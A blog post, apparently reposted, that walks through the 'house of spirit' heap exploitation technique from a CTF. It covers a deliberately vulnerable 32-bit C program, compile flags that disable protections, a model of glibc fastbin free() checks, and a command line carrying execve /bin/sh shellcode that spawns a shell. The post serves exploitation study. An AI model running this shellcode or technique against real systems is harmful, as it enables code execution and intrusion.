I studied a stack-overflow exploitation technique introduced in L-CTF and am writing it down here.
The sample code is as follows:
/*
 * blackngel's vulnerable program slightly modified by gb_master
 */
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

void fvuln(char *str1, int age)
{
    char *ptr1, name[32];
    int local_age;
    char *ptr2;

    local_age = age;
    ptr1 = (char *) malloc(256);
    printf("\nPTR1 = [ %p ]", ptr1);
    strcpy(name, str1);              /* unbounded copy: overflows name[32] into the locals above it */
    printf("\nPTR1 = [ %p ]\n", ptr1);
    free(ptr1);                      /* ptr1 may have been overwritten by the copy */
    ptr2 = (char *) malloc(40);
    snprintf(ptr2, 40-1, "%s is %d years old", name, local_age);
    printf("\n%s\n", ptr2);
}

int main(int argc, char *argv[])
{
    int pad[10] = {0, 0, 0, 0, 0, 0, 0, 10, 0, 0};
    if (argc == 3)
        fvuln(argv[1], atoi(argv[2]));
    return 0;
}
The compile command is as follows:
gcc hos.c -m32 -fno-stack-protector -mpreferred-stack-boundary=2 -mno-accumulate-outgoing-args -z execstack -o hos
To compile on Ubuntu 14 Server you first need to install the 32-bit development package; otherwise the build fails with an error that sys/cdefs.h cannot be found:
sudo apt-get install libc6-dev-i386
The key idea here: use the overflow to overwrite the address held in a local variable (the pointer that is later freed) with an address on the stack, and set the size field of that forged chunk to a valid fastbin size so that free() accepts it. The subsequent malloc() then hands that same memory back out, and snprintf() writes data into it, which allows the function's return address to be overwritten and ultimately yields a shell.
The memory layout of the local variables is as follows:
0xffffd03c name
0xffffd05c ptr2
0xffffd060 ptr1
0xffffd064 local_age
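An added example, not code from the post: it models the checks that the glibc 2.19 free() path applies before it accepts a chunk into a fastbin, plus the request-to-chunk-size rounding, which is why a malloc(40) under -m32 needs a forged size field of exactly 48 (the value passed as the age argument). The function names and the sample values are my own assumptions.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>
/* x86 glibc: MALLOC_ALIGNMENT = 2*SIZE_SZ, MINSIZE = 4*SIZE_SZ; sizesz is 4 (-m32) or 8 */
static size_t align_mask(size_t sizesz) { return 2 * sizesz - 1; }
static size_t min_chunk(size_t sizesz) { return 4 * sizesz; }

/* request2size(): the chunk size glibc carves for a malloc() request, i.e. the
 * value a forged chunk must carry in its size field to be handed back later. */
size_t request2size(size_t req, size_t sizesz)
{
    size_t m = align_mask(sizesz);
    if (req + sizesz + m < min_chunk(sizesz))
        return min_chunk(sizesz);
    return (req + sizesz + m) & ~m;
}

/* get_max_fast() with the default M_MXFAST of 64*SIZE_SZ/4. */
size_t max_fast(size_t sizesz)
{
    return (64 * sizesz / 4 + sizesz) & ~align_mask(sizesz);
}

/* Model of the _int_free() fastbin path in glibc 2.19 (Ubuntu 14, as in the
 * post). NULL: free() accepts the chunk into a fastbin; otherwise the abort
 * message. size/next_size are raw size fields (flag bits included). Later
 * glibc adds tcache (2.26) and safe-linking (2.32), which are not modelled. */
const char *fastbin_free_check(size_t chunk_addr, size_t size, size_t next_size,
                               size_t system_mem, size_t sizesz)
{
    size_t m = align_mask(sizesz);
    size_t sz = size & ~(size_t)7;        /* chunksize(): strip the flag bits */
    if (chunk_addr & m)
        return "free(): invalid pointer";  /* misaligned_chunk() */
    if (sz < min_chunk(sizesz) || (sz & m))
        return "free(): invalid size";
    if (sz > max_fast(sizesz))
        return "not a fastbin size";       /* takes the non-fast path instead */
    if (next_size <= 2 * sizesz || (next_size & ~(size_t)7) >= system_mem)
        return "free(): invalid next size (fast)";
    return NULL;
}

int main(void)
{   /* constructed values for the post's -m32 layout: forged chunk at
     * 0xffffd068, its size field (local_age at 0xffffd064) holding 48 */
    const char *r = fastbin_free_check(0xffffd068, 48, 0x41, 0x21000, 4);
    printf("malloc(40) -> chunk %zu; free(): %s\n", request2size(40, 4), r ? r : "ok");
    return 0;
}
```

The next-size check is the reason a forged stack chunk also needs plausible bytes just past its end; a build with a newer glibc goes through tcache first and applies different checks.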
The sample test command is as follows:
./hos `python -c 'import sys; sys.stdout.write("\x31\xc0\xeb\x14\x44\xd0\xff\xff\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80\x90" + "\x01\x01\x01\x68\xd0\xFF\xFF" + "\x30")'` 48
There is a problem here: running it under GDB gets a shell, but running it directly gives a segmentation fault:
Published by 主机参考 (zhujicankao.com); when reposting please credit: [Exploitation technique] house of spirit friendly stack overflow https://zhujicankao.com/12451.html